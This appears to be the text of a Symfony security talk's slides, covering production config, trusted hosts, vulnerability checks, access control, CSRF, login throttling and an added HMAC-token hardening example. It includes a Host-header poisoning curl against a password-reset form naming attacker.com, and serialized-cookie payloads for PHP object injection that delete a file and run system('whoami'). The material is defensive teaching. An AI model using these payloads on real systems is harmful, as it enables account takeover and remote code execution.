Developer at Blackfire.io
@symfony core team & security team
@jderusse
composer install --no-dev
APP_ENV=prod
// bundles.php
return [
    Doctrine\Bundle\FixturesBundle\DoctrineFixturesBundle::class => ['dev' => true, 'test' => true],
    Symfony\Bundle\DebugBundle\DebugBundle::class => ['dev' => true, 'test' => true],
    Symfony\Bundle\MakerBundle\MakerBundle::class => ['dev' => true],
    Symfony\Bundle\WebProfilerBundle\WebProfilerBundle::class => ['dev' => true, 'test' => true],
];
// composer.json
"require-dev": {
    "doctrine/doctrine-fixtures-bundle": "^3.4",
    "symfony/debug-bundle": "^5.4",
    "symfony/maker-bundle": "^1.34",
    "symfony/web-profiler-bundle": "^5.4"
}
<p>
    You asked to reset your password. <br />
    This can be done by clicking the link below.
</p>
<p>
    <a href="{{ url('set_password', {token: token}) }}">
        Reset my password
    </a>
</p>
$ curl http://acme.com/forgot-password \
    -X POST \
    -d "user=victim" \
    -H "host: attacker.com"
* Trying 157.131.111.93:80...
* Connected to acme.com port 80
> POST /forgot-password HTTP/1.1
> Host: attacker.com
>
> user=victim
http://attacker.com/set-password?token=...
You asked to reset your password.
This can be done by clicking the link below.
Reset my password
From: admin@acme.com
I forgot my password
attacker
framework:
    trusted_hosts:
        - '^acme\.com$'
        - '^(www|blog)\.acme\.org$'
framework:
    trusted_proxies: '192.0.0.1,10.0.0.0/8'
    trusted_headers:
        # - 'x-forwarded-host'  # Make sure the proxy really sends it
        - 'x-forwarded-proto'
        - 'x-forwarded-port'
title: "CVE-2020-5274: Fix Exception message escaping rendered by ErrorHandler"
link: https://symfony.com/cve-2020-5274
cve: CVE-2020-5274
branches:
    4.4.x:
        time: 2020-03-30 14:00:00
        versions: ['>=4.4.0', '<4.4.4']
    5.0.x:
        time: 2020-03-30 14:00:00
        versions: ['>=5.0.0', '<5.0.4']
reference: composer://symfony/error-handler
$ local-php-security-checker
Symfony Security Check Report
=============================
1 package has known vulnerabilities.
symfony/error-handler (v5.0.3)
------------------------------
* [CVE-2020-5274][]: Fix Exception message escaping rendered by ErrorHandler
[CVE-2020-5274]: https://symfony.com/cve-2020-5274
Note that this checker can only detect vulnerabilities that are referenced in the security
advisories database.
Execute this command regularly to check the newly discovered vulnerabilities.
$ symfony security:check
...
public function adminDashboard(): Response
{
    $this->denyAccessUnlessGranted('ROLE_ADMIN');
}
security:
    access_control:
        - { path: ^/admin, roles: ROLE_ADMIN }
        - { path: ^/profile, roles: ROLE_USER }
public function BlogPostEdit(Post $post): Response
{
    $this->denyAccessUnlessGranted('post_edit', $post);
}
framework:
    csrf_protection: ~
public function delete(Request $request): Response
{
    $submittedToken = $request->request->get('token');
    if (!$this->isCsrfTokenValid('delete-user', $submittedToken)) {
        throw new BadRequestHttpException();
    }
}
<a href="{{ path('user_delete', {
        id: user.id,
        csrf_token: csrf_token('delete-user')
    }) }}"
>
    DELETE
</a>
class TempFile
{
    private string $filename;

    public function __construct()
    {
        $this->filename = tempnam(sys_get_temp_dir(), 'test');
    }

    public function __destruct()
    {
        unlink($this->filename);
    }

    public function write(string $content): void {}
}
$_COOKIE['token'] = 'O:8:"TempFile":1:{s:8:"filename";s:17:"../src/Kernel.php";}';
unserialize($_COOKIE['token']);
namespace MessagingComponent;

class MessageBuffer
{
    private $messages = [];
    private $processor;

    public function __construct(ProcessorInterface $processor) {
        $this->processor = $processor;
    }

    public function __destruct() {
        $this->processor->flush($this->messages);
    }
}
namespace TestingFramework;

class Runner
{
    private $serviceLocator;

    public function __construct(array $serviceLocator) {
        $this->serviceLocator = $serviceLocator;
    }

    public function __call($method, $arguments) {
        return call_user_func_array(
            $this->serviceLocator[$method],
            $arguments,
        );
    }
}
[
    'flush' => 'system'
]
'whoami'
$_COOKIE['token'] = 'O:32:"MessagingComponent\MessageBuffer":2:{s:42:"MessagingComponent\MessageBuffermessages";s:6:"whoami";s:43:"MessagingComponent\MessageBufferprocessor";O:23:"TestingFramework\Runner":1:{s:39:"TestingFramework\RunnerserviceLocator";a:1:{s:5:"flush";s:6:"system";}}}';
unserialize($_COOKIE['token']);
// will call
system('whoami');
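Both chains above only work because unserialize() is fed attacker-controlled cookie data and instantiates whatever class the payload names. An added hardening example, not from the talk: the server signs the token it issues with an HMAC, checks that signature in constant time before touching the content, and keeps the content in JSON so no object is ever built from user input. The token format, the class name and the demo key are assumptions (PHP 8).

```php
<?php
declare(strict_types=1);

// Added example (not from the slides): replace unserialize($_COOKIE['token']).
// The cookie carries "<base64 json>.<hmac-sha256 hex>"; the key lives only server-side.
final class SignedToken
{
    public function __construct(private string $secret) {}

    /** Encode $data as JSON and append an HMAC tag keyed by the server secret. */
    public function issue(array $data): string
    {
        $payload = base64_encode(json_encode($data, JSON_THROW_ON_ERROR));
        return $payload.'.'.hash_hmac('sha256', $payload, $this->secret);
    }

    /** Return the decoded data, or null when the token is malformed or tampered with. */
    public function verify(string $token): ?array
    {
        $parts = explode('.', $token, 2);
        if (count($parts) !== 2) {
            return null;
        }
        [$payload, $tag] = $parts;
        $expected = hash_hmac('sha256', $payload, $this->secret);
        // Constant-time comparison; a plain === would leak timing information.
        if (!hash_equals($expected, $tag)) {
            return null;
        }
        // json_decode() never instantiates classes, unlike unserialize().
        $data = json_decode(base64_decode($payload, true) ?: '', true);
        return is_array($data) ? $data : null;
    }
}

// Demo key generated per run; a real deployment reads it from APP_SECRET (assumption).
$tokens = new SignedToken(random_bytes(32));
$cookie = $tokens->issue(['user' => 42]);

assert($tokens->verify($cookie) === ['user' => 42]);
// A forged cookie such as the O:8:"TempFile" payload fails the HMAC check and is
// rejected before anything is decoded.
assert($tokens->verify('O:8:"TempFile":1:{s:8:"filename";s:17:"../src/Kernel.php";}') === null);

// If legacy data must stay in PHP's native format, at least forbid object creation:
$legacy = unserialize('a:1:{s:4:"user";i:42;}', ['allowed_classes' => false]);
assert($legacy === ['user' => 42]);
```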
# config/packages/security.yaml
security:
    enable_authenticator_manager: true
    firewalls:
        main:
            login_throttling:
                max_attempts: 3
                interval: '15 minutes'
It is better to know you are in danger than to think you are safe
Alphonse de Lamartine
@jderusse